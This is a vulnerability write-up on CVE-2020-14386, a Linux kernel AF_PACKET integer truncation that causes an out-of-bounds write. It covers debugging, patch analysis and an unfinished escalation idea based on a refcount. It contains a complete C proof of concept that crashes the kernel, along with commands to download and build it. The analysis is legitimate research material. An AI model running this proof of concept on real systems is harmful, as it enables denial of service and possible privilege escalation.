Environment setup
(1) Download the debug image:
sudo apt-get install debootstrap
wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh
chmod +x create-image.sh
./create-image.sh
(2) Build the kernel
(3) Build the PoC
wget https://raw.githubusercontent.com/cgwalters/cve-2020-14386/master/cve-cap-net-raw.c
gcc cve-cap-net-raw.c -o poc -static
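(4) Give the PoC the CAP_NET_RAW capability. An unprivileged user can also obtain CAP_NET_RAW inside a new user and network namespace, which requires the kernel to be built with CONFIG_USER_NS=y.
# grant the cap_net_raw capability
setcap cap_net_raw+ep ./poc
# show the capabilities of the program
getcap ./poc
# remove the cap_net_raw capability
setcap cap_net_raw-ep ./poc
For debugging only, the PoC can simply be run as root:
sudo ./poc skip-unshare
(5) Copy the PoC into the QEMU image; it can then be debugged there.
Set a breakpoint: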
b tpacket_rcv
Background
Linux kernel memory layout
0xffffffffffffffff ---+-----------+-----------------------------------------------+-------------+
| | |+++++++++++++|
8M | | unused hole |+++++++++++++|
| | |+++++++++++++|
0xffffffffff7ff000 ---|-----------+------------| FIXADDR_TOP |--------------------|+++++++++++++|
1M | | |+++++++++++++|
0xffffffffff600000 ---+-----------+------------| VSYSCALL_ADDR |------------------|+++++++++++++|
548K | | vsyscalls |+++++++++++++|
0xffffffffff577000 ---+-----------+------------| FIXADDR_START |------------------|+++++++++++++|
5M | | hole |+++++++++++++|
0xffffffffff000000 ---+-----------+------------| MODULES_END |--------------------|+++++++++++++|
| | |+++++++++++++|
1520M | | module mapping space (MODULES_LEN) |+++++++++++++|
| | |+++++++++++++|
0xffffffffa0000000 ---+-----------+------------| MODULES_VADDR |------------------|+++++++++++++|
| | |+++++++++++++|
512M | | kernel text mapping, from phys 0 |+++++++++++++|
| | |+++++++++++++|
0xffffffff80000000 ---+-----------+------------| __START_KERNEL_map |-------------|+++++++++++++|
2G | | hole |+++++++++++++|
0xffffffff00000000 ---+-----------+-----------------------------------------------|+++++++++++++|
64G | | EFI region mapping space |+++++++++++++|
0xffffffef00000000 ---+-----------+-----------------------------------------------|+++++++++++++|
444G | | hole |+++++++++++++|
0xffffff8000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
16T | | %esp fixup stacks |+++++++++++++|
0xffffff0000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
3T | | hole |+++++++++++++|
0xfffffc0000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
16T | | kasan shadow memory (16TB) |+++++++++++++|
0xffffec0000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
1T | | hole |+++++++++++++|
0xffffeb0000000000 ---+-----------+-----------------------------------------------| kernel space|
1T | | virtual memory map for all of struct pages |+++++++++++++|
0xffffea0000000000 ---+-----------+------------| VMEMMAP_START |------------------|+++++++++++++|
1T | | hole |+++++++++++++|
0xffffe90000000000 ---+-----------+------------| VMALLOC_END |------------------|+++++++++++++|
32T | | vmalloc/ioremap (1 << VMALLOC_SIZE_TB) |+++++++++++++|
0xffffc90000000000 ---+-----------+------------| VMALLOC_START |------------------|+++++++++++++|
1T | | hole |+++++++++++++|
0xffffc80000000000 ---+-----------+-----------------------------------------------|+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
64T | | direct mapping of all phys. memory |+++++++++++++|
| | (1 << MAX_PHYSMEM_BITS) |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
| | |+++++++++++++|
0xffff880000000000 ----+-----------+-----------| __PAGE_OFFSET_BASE | -------------|+++++++++++++|
| | |+++++++++++++|
8T | | guard hole, reserved for hypervisor |+++++++++++++|
| | |+++++++++++++|
0xffff800000000000 ----+-----------+-----------------------------------------------+-------------+
|-----------| |-------------|
|-----------| hole caused by [48:63] sign extension |-------------|
|-----------| |-------------|
0x0000800000000000 ----+-----------+-----------------------------------------------+-------------+
PAGE_SIZE | | guard page |xxxxxxxxxxxxx|
0x00007ffffffff000 ----+-----------+--------------| TASK_SIZE_MAX | ---------------|xxxxxxxxxxxxx|
| | | user space |
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
128T | | different per mm |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
| | |xxxxxxxxxxxxx|
0x0000000000000000 ----+-----------+-----------------------------------------------+-------------+
PACKET_MMAP
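A PF_PACKET socket of type SOCK_DGRAM or SOCK_RAW can exchange packets with user space in the usual way, by copying them between kernel and user buffers. It can also set up a receive ring buffer with setsockopt and share that memory with the application through mmap. If the PACKET_VNET_HDR option has been enabled with setsockopt, each frame additionally carries a virtio_net_hdr structure placed directly before the packet data, alongside the other per-packet information blocks stored in the frame.
There are currently three versions of the TPACKET header, and their lengths differ slightly. User space selects the version with setsockopt(PACKET_VERSION) and can query the header length of the selected version with getsockopt(PACKET_HDRLEN); this length is needed when sizing the receive ring.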
enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3
};
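For versions 1 and 2, both the receive and the transmit ring are configured with four parameters: the size and number of memory blocks, and the size and total number of frames.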
struct tpacket_req {
unsigned int tp_block_size; /* Minimal size of contiguous block */
unsigned int tp_block_nr; /* Number of blocks */
unsigned int tp_frame_size; /* Size of frame */
unsigned int tp_frame_nr; /* Total number of frames */
};
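This structure is defined in /usr/include/linux/if_packet.h and describes a ring buffer, which is simply a memory region that stores packets. Each packet is stored in its own frame, and frames are grouped into blocks. Each block holds frames_per_block = tp_block_size / tp_frame_size frames; tp_block_nr is the total number of blocks and tp_frame_nr is the total number of frames.
For example: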
tp_block_size= 4096
tp_frame_size= 2048
tp_block_nr = 4
tp_frame_nr = 8
The resulting buffer layout is shown below:
block #1 block #2
+---------+---------+ +---------+---------+
| frame 1 | frame 2 | | frame 3 | frame 4 |
+---------+---------+ +---------+---------+
block #3 block #4
+---------+---------+ +---------+---------+
| frame 5 | frame 6 | | frame 7 | frame 8 |
+---------+---------+ +---------+---------+
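The blocks are tracked by pg_vec, a vector that is allocated dynamically with kmalloc. Each block is allocated on its own, so blocks are not necessarily adjacent to each other: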
static char *alloc_one_pg_vec_page(unsigned long order)
{
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;
}
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
}
}
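A ring buffer is the buffer used for packet processing: rx_ring receives packets and tx_ring transmits them. They are configured with the PACKET_RX_RING and PACKET_TX_RING options of setsockopt respectively. packet_ring_buffer is defined as follows: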
struct packet_ring_buffer {
struct pgv *pg_vec;
struct tpacket_kbdq_core prb_bdqc;
}
struct pgv {
char *buffer;
}
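The pg_vec field points to an array of pgv structures, each of which holds a reference to one memory block. Every block is allocated separately, so the blocks do not form one contiguous memory region.
Vulnerability analysis
packet_set_ring->tpacket_rcv:
Vulnerable code: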
static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
struct packet_type *pt, struct net_device *orig_dev)
{
// ...
if (sk->sk_type == SOCK_DGRAM) {
macoff = netoff = TPACKET_ALIGN(po->tp_hdrlen) + 16 +
po->tp_reserve;
} else {
unsigned int maclen = skb_network_offset(skb);
// tp_reserve is unsigned int, netoff is unsigned short. Addition can overflow netoff
netoff = TPACKET_ALIGN(po->tp_hdrlen +
(maclen < 16 ? 16 : maclen)) +
po->tp_reserve; // [1]
if (po->has_vnet_hdr) {
netoff += sizeof(struct virtio_net_hdr);
do_vnet = true;
}
// Attacker controls netoff and can make macoff be smaller than sizeof(struct virtio_net_hdr)
macoff = netoff - maclen; // [2]
}
// ...
// "macoff - sizeof(struct virtio_net_hdr)" can be negative, resulting in a pointer before h.raw
if (do_vnet &&
virtio_net_hdr_from_skb(skb, h.raw + macoff -
sizeof(struct virtio_net_hdr),
vio_le(), true, 0)) { // [3]
// ...
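The bug is at [1]. netoff is an unsigned short with range [0, 0xffff], whereas tp_reserve is an unsigned int with range [0, 0xffffffff]; the assignment converts the sum to unsigned short and drops its upper two bytes. An attacker can therefore steer netoff at [2] so that macoff ends up smaller than sizeof(struct virtio_net_hdr). At [3], macoff - sizeof(struct virtio_net_hdr) is then negative, so data is written in front of the address h.raw, which is an out-of-bounds write before the start of the buffer.
Debugging session:
[1] corresponds to the instructions highlighted in the original debugger screenshot. po->tp_reserve is stored at $rbp+0x4e4 and is loaded into esi with the value 0xffb4. maclen is 0xe and is kept in edx; the expression (maclen < 16 ? 16 : maclen) turns it into 0x10. eax holds 0x43, that is po->tp_hdrlen with the rounding constant of TPACKET_ALIGN already added (0x34 + 0xf).
TPACKET_ALIGN(po->tp_hdrlen + (maclen < 16 ? 16 : maclen)) therefore evaluates to (0x10 + 0x43) & 0xfffffff0 = 0x50.
Adding po->tp_reserve gives 0xffb4 + 0x50 = 0x10004, but because netoff is an unsigned short the result is passed in ax and truncated, so netoff = 0x4.
Before [2] is reached, the following check is executed: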
if (po->has_vnet_hdr) {
netoff += sizeof(struct virtio_net_hdr);
do_vnet = true;
}
The virtio_net_hdr structure is 0xa bytes long, so netoff becomes 0x4 + 0xa = 0xe.
At [2]:
macoff = netoff - maclen;
macoff = 0xe - 0xe = 0x0.
At [3]:
if (do_vnet &&
virtio_net_hdr_from_skb(skb, h.raw + macoff -
sizeof(struct virtio_net_hdr),
vio_le(), true, 0)) {
virtio_net_hdr_from_skb is implemented as follows:
static inline int virtio_net_hdr_from_skb(const struct sk_buff *skb,
struct virtio_net_hdr *hdr,
bool little_endian,
bool has_data_valid,
int vlan_hlen)
{
memset(hdr, 0, sizeof(*hdr)); /* no info leak */
if (skb_is_gso(skb)) {
struct skb_shared_info *sinfo = skb_shinfo(skb);
/* This is a hint as to how much should be linear. */
hdr->hdr_len = __cpu_to_virtio16(little_endian,
skb_headlen(skb));
hdr->gso_size = __cpu_to_virtio16(little_endian,
sinfo->gso_size);
if (sinfo->gso_type & SKB_GSO_TCPV4)
hdr->gso_type = VIRTIO_NET_HDR_GSO_TCPV4;
else if (sinfo->gso_type & SKB_GSO_TCPV6)
hdr->gso_type = VIRTIO_NET_HDR_GSO_TCPV6;
else
return -EINVAL;
if (sinfo->gso_type & SKB_GSO_TCP_ECN)
hdr->gso_type |= VIRTIO_NET_HDR_GSO_ECN;
} else
hdr->gso_type = VIRTIO_NET_HDR_GSO_NONE;
if (skb->ip_summed == CHECKSUM_PARTIAL) {
hdr->flags = VIRTIO_NET_HDR_F_NEEDS_CSUM;
hdr->csum_start = __cpu_to_virtio16(little_endian,
skb_checksum_start_offset(skb) + vlan_hlen);
hdr->csum_offset = __cpu_to_virtio16(little_endian,
skb->csum_offset);
} else if (has_data_valid &&
skb->ip_summed == CHECKSUM_UNNECESSARY) {
hdr->flags = VIRTIO_NET_HDR_F_DATA_VALID;
} /* else everything is zero */
return 0;
}
h.raw is 0xffffc90000429000 and is held in %r10; macoff, computed above, is 0x0 and is held in %rdx; struct virtio_net_hdr is 0xa bytes long. The hdr argument is therefore h.raw + macoff - sizeof(struct virtio_net_hdr) = (0xffffc90000429000 + 0) - 0xa = 0xffffc90000428ff6. That address is not mapped, and virtio_net_hdr_from_skb starts by initializing hdr with memset, so the access faults and the kernel crashes in do_page_fault.
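Limitations of the vulnerability:
The vulnerability requires the process to hold CAP_NET_RAW, and it can only write 1~10 bytes before the start of the buffer. The out-of-bounds write happens in virtio_net_hdr_from_skb(skb, h.raw + macoff - sizeof(struct virtio_net_hdr), vio_le(), true, 0): to reach an address before h.raw a negative offset has to be added, and since macoff is an unsigned short with a minimum of 0, the most that can be subtracted is the size of one virtio_net_hdr structure (0xa bytes).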
PoC code:
/* Taken from https://www.openwall.com/lists/oss-security/2020/09/03/3 */
#define _GNU_SOURCE
#include <sched.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdbool.h>
#include <stdarg.h>
#include <net/if.h>
#include <stdint.h>
#define KMALLOC_PAD 512
#define PAGEALLOC_PAD 1024
void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr) {
int v = TPACKET_V2;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0) {
perror("[-] setsockopt(PACKET_VERSION)");
exit(EXIT_FAILURE);
}
v = 1;
rv = setsockopt(s, SOL_PACKET, PACKET_VNET_HDR, &v, sizeof(v));
if (rv < 0) {
perror("[-] setsockopt(PACKET_VNET_HDR)");
exit(EXIT_FAILURE);
}
v = 0xffff - 20 - 0x30 -7; //0xffb4
rv = setsockopt(s, SOL_PACKET, PACKET_RESERVE, &v, sizeof(v));
if (rv < 0) {
perror("[-] setsockopt(PACKET_RESERVE)");
exit(EXIT_FAILURE);
}
struct tpacket_req req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (rv < 0) {
perror("[-] setsockopt(PACKET_RX_RING)");
exit(EXIT_FAILURE);
}
}
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
perror("[-] socket(AF_PACKET)");
exit(EXIT_FAILURE);
}
packet_socket_rx_ring_init(s, block_size, frame_size, block_nr);
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;
int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0) {
perror("[-] bind(AF_PACKET)");
exit(EXIT_FAILURE);
}
return s;
}
// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
int packet_sock_kmalloc() {
int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
if (s == -1) {
perror("[-] socket(SOCK_DGRAM)");
exit(EXIT_FAILURE);
}
return s;
}
void kmalloc_pad(int count) {
int i;
for (i = 0; i < count; i++)
packet_sock_kmalloc();
}
void pagealloc_pad(int count) {
packet_socket_setup(0x8000, 2048, count);
}
bool write_file(const char* file, const char* what, ...) {
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
close(fd);
return false;
}
close(fd);
return true;
}
void setup_unshare() {
int real_uid = getuid();
int real_gid = getgid();
if (unshare(CLONE_NEWUSER) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
perror("[-] unshare(CLONE_NEWNET)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/setgroups", "deny")) {
perror("[-] write_file(/proc/self/set_groups)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
perror("[-] write_file(/proc/self/uid_map)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
perror("[-] write_file(/proc/self/gid_map)");
exit(EXIT_FAILURE);
}
}
void prep() {
cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
perror("[-] sched_setaffinity()");
exit(EXIT_FAILURE);
}
}
void packet_socket_send(int s, char *buffer, int size) {
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_halen = ETH_ALEN;
if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,
sizeof(sa)) < 0) {
perror("[-] sendto(SOCK_RAW)");
exit(EXIT_FAILURE);
}
}
void loopback_send(char *buffer, int size) {
int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (s == -1) {
perror("[-] socket(SOCK_RAW)");
exit(EXIT_FAILURE);
}
packet_socket_send(s, buffer, size);
}
int main(int argc, char **argv)
{
int skip_unshare = 0;
struct stat stbuf;
if (argc > 1 && strcmp (argv[1], "skip-unshare") == 0)
skip_unshare = 1;
else if (stat ("/run/secrets/kubernetes.io", &stbuf) == 0)
skip_unshare = 1;
if (!skip_unshare)
setup_unshare();
prep();
packet_socket_setup(0x800000, 0x11000, 2);
uint32_t size = 0x80000/8;
char* buf = malloc(size);
if (!buf) {
perror("[-] malloc");
exit(EXIT_FAILURE);
}
memset(buf,0xce,size);
loopback_send(buf,size);
return 0;
}
Stack backtrace:
#0 memset_erms () at arch/x86/lib/memset_64.S:66
#1 0xffffffff831934a6 in virtio_net_hdr_from_skb
(little_endian=<optimized out>, has_data_valid=<optimized out>,
vlan_hlen=<optimized out>, hdr=<optimized out>, skb=<optimized
out>) at ./include/linux/virtio_net.h:134
#2 tpacket_rcv (skb=0xffff8881ef539940, dev=0xffff8881de534000,
pt=<optimized out>, orig_dev=<optimized out>)
at net/packet/af_packet.c:2287
#3 0xffffffff82c52e47 in dev_queue_xmit_nit (skb=0xffff8881ef5391c0,
dev=<optimized out>) at net/core/dev.c:2276
#4 0xffffffff82c5e3d4 in xmit_one (more=<optimized out>,
txq=<optimized out>, dev=<optimized out>,
skb=<optimized out>) at net/core/dev.c:3473
#5 dev_hard_start_xmit (first=0xffffc900001c0ff6, dev=0x0
<fixed_percpu_data>, txq=0xa <fixed_percpu_data+10>,
ret=<optimized out>) at net/core/dev.c:3493
#6 0xffffffff82c5fc7e in __dev_queue_xmit (skb=0xffff8881ef5391c0,
sb_dev=<optimized out>) at net/core/dev.c:4052
#7 0xffffffff831982d3 in packet_snd (len=65536, msg=<optimized out>,
sock=<optimized out>)
at net/packet/af_packet.c:2979
#8 packet_sendmsg (sock=<optimized out>, msg=<optimized out>,
len=65536) at net/packet/af_packet.c:3004
#9 0xffffffff82be09ed in sock_sendmsg_nosec (msg=<optimized out>,
sock=<optimized out>) at net/socket.c:652
#10 sock_sendmsg (sock=0xffff8881e8ff56c0, msg=0xffff8881de56fd88) at
net/socket.c:672
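Exploitation
This vulnerability is similar to CVE-2017-7308, the signedness error in the Linux kernel's packet_set_ring, except that CVE-2017-7308 overflows toward higher addresses.
Exploitation attempt:
The idea was to shape the heap as in the CVE-2017-7308 exploit, but packet_set_ring performs sanity checks. To trigger the bug po->tp_reserve is set to 0xffb4, which makes the minimum frame size min_frame_size computed at 【1】 below equal to 0xffe8, so a block must be at least 0x10000 bytes. With blocks that large it is not possible to control which structure ends up next to a block. (It is unclear to me which allocator path serves blocks of this size, for example some vmalloc-xxx cache, and which structures could be placed there.)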
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
// ...
if (req->tp_block_nr) {
unsigned int min_frame_size;
/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}
err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve; // <------------【1】compute min_frame_size
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size)) // <-----------【2】 the frame size must not be smaller than min_frame_size
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;
rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0)) // <----------------【3】 a block must not be smaller than a frame
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;
// allocate the memory blocks of the ring buffer:
err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);
packet_sock objects are allocated with kmalloc() through the slab allocator, which mainly serves objects smaller than a single memory page.
How h.raw is obtained:
tpacket_rcv:
-> h.raw = packet_current_rx_frame(po, skb,TP_STATUS_KERNEL, (macoff+snaplen));
->case TPACKET_V2:
curr = packet_lookup_frame(po, &po->rx_ring, po->rx_ring.head, status);
static void *packet_lookup_frame(struct packet_sock *po,
struct packet_ring_buffer *rb,
unsigned int position,
int status)
{
unsigned int pg_vec_pos, frame_offset;
union tpacket_uhdr h;
pg_vec_pos = position / rb->frames_per_block;
frame_offset = position % rb->frames_per_block;
h.raw = rb->pg_vec[pg_vec_pos].buffer +
(frame_offset * rb->frame_size);
if (status != __packet_get_status(po, h.raw))
return NULL;
return h.raw;
}
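The vulnerability can only write 1~10 bytes before the buffer, and a block has to be at least 0x10000 bytes, so exploitation currently looks very hard.
The original author's exploitation idea: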
struct sctp_shared_key {
struct list_head key_list;
struct sctp_auth_bytes *key;
refcount_t refcnt;
__u16 key_id;
__u8 deactivated;
};
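The original author's idea is to place a structure containing a refcount right before the ring buffer and use the underflow to reduce the refcount, because the memset in virtio_net_hdr_from_skb writes zeros. Once the refcount has been lowered, the object is treated as released while it is still in use, which turns the bug into a use-after-free.
The candidate found so far is sctp_shared_key. It is 32 bytes long and is allocated from kmalloc-32. A page is 4K and 4K % 32 = 0, while the ring buffer allocation is page aligned, so the goal is to get a sctp_shared_key allocated in the last slot of the page that precedes the ring buffer.
Because of structure alignment, key_id, deactivated and one byte of tail padding together fill the last 4 bytes of the object, so refcnt occupies offsets 24~27. An underflow of 5~6 bytes therefore reaches the upper 1~2 bytes of refcnt.
I also wondered whether the author was mistaken in saying that the two most significant bytes of refcnt are overwritten, or whether big-endian storage was meant. On little-endian x86-64 the most significant bytes of refcnt sit at its highest addresses, which are the ones closest to the ring buffer, so the description is consistent and the refcount=10001b shown in the author's figure makes sense.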
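Summary:
This article analyzed the root cause of CVE-2020-14386, a privilege escalation vulnerability in the Linux kernel's AF_PACKET implementation, and walked through the original author's exploitation idea, but did not implement an exploit. Hopefully it serves as a starting point for someone to complete the exploit or to share further ideas.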
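Patch analysis
The patch changes the type of netoff to unsigned int, so both sides of the assignment have the same type and the sum is no longer truncated. It also checks that netoff does not exceed USHRT_MAX.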
References
https://gvisor.dev/blog/2020/09/18/containing-a-real-vulnerability/
https://www.openwall.com/lists/oss-security/2020/09/03/3
https://cert.360.cn/warning/detail?id=e73761f3747ae3b13b61b7f25a9a8e8a
https://mp.weixin.qq.com/s/uv3BiznUCUy8do_ullnXUw
https://blog.csdn.net/sinat_20184565/article/details/82788387
https://www.anquanke.com/post/id/86139
https://xz.aliyun.com/t/3455#toc-4
https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
https://github.com/bcoles/kernel-exploits/blob/master/CVE-2017-7308/poc.c
docker: https://github.com/cgwalters/cve-2020-14386
The original author's vulnerability analysis: https://unit42.paloaltonetworks.com/cve-2020-14386/
Patch:
packet_mmap: https://elixir.bootlin.com/linux/v5.6/source/Documentation/networking/packet_mmap.txt